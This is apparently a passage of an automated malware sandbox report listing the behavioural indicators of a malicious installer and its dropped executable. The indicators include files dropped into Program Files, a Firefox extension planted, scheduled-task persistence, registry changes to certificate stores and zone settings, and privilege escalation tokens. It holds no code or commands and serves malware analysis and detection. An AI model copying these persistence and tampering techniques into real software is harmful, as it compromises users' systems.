File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File created C:\Program Files (x86)\RFIumDCEBXXU2\LFylShE.xml C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File created C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\bQHlHYD.dll C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File created C:\Program Files (x86)\AClHKqYMJaBBC\atrxmZN.xml C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File created C:\Program Files (x86)\vEcQBTYFTXUn\BGlWDNS.dll C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File created C:\Program Files (x86)\ijLlchIpU\LnuMgT.dll C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File created C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\vzWnlIa.xml C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File created C:\Program Files (x86)\ijLlchIpU\kjnuipy.xml C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File created C:\Program Files (x86)\RFIumDCEBXXU2\RLKnTuqMCgmTd.dll C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File created C:\Program Files (x86)\AClHKqYMJaBBC\YCJghdf.dll C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bGTnZQDECKwDuNSWyq.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\GSDaywQPJdyrKXMOz.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\hijxFSKlICFAhziPp.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fc7460-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
